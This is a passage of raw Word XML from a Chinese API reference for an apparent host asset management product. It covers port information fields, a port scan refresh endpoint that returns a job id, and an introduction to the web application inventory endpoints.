            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0435217E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1EECAEB8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B5717B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6735532B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03C47F5A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2456544C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="462E93C0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F78AC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B93EE80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0531883C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58441035" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B918D64" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03E70612" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E0816F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD24F32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52352321" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C1D70DB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79EA1E73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="259F1BEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63FE967B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38DFC88C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71C88F93" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="107F8523" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072341B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E9C030E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="722E3588" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6203D4C3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3638ED45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40F33513" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D47FEE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E0ADE6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="622E7388" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48061C86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D8118CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CA114F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AAE0CD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D8104B9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B131ECB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17912B4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37366BAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DCDDC16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>绑定</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="095CFA5B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="799EE0AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1E6B3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D05296D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A1316C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口状态：-1 - 端口状态未知；0 – 仅内网可访问；1 - 外网可访问,null不存在该字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EFD1B6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc115166105"/>
      <w:bookmarkStart w:id="62" w:name="端口信息扫描"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r>
        <w:t>端口信息扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="5F11D812" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求端口信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B2293" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8A3ACB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/port/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>win|linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE4BF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB55B36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78F299" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FF921A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/port/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C94C3F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322EB060" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44311DF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B56F3A2"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41CD4719"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62C2135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B2D5B3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1611B569" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40694201" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2115F76F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6546F19B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A6D15BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55E8271D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46315E80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F031B9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DAFC184" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc115166106"/>
      <w:bookmarkStart w:id="64" w:name="端口信息查询扫描状态"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r>
        <w:t>端口信息查询扫描状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="0A9FC89D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询系统端口信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFD2A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc115166107"/>
      <w:bookmarkStart w:id="66" w:name="web应用信息"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Web应用信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="5BA028AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>用于查询主机上web应用信息；每条数据均包含主机信息，您可以灵活的使用该接口组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A456BE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4449952C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该功能API用于查询资产中的web应用信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EC966B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053741D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>web应用信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9A764B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB8FB87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F96538B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050FCBC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web应用信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A082678" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web应用信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B89965" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>web应用信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E17C54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366B64AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用web应用信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51022999" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>获取更新数据则先调用2号接口进行更新再调用3号接口查看是否更新完成，最后再调用1号接口查询最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B02A9DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103BC14E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc115166108"/>
      <w:bookmarkStart w:id="68" w:name="web应用信息查询结果"/>
      <w:r>
        <w:t>web应用信息查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="5F739963" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于查询web应用信息，按每台主机每个用户组进行展示。</w:t>
      </w:r>
    </w:p>
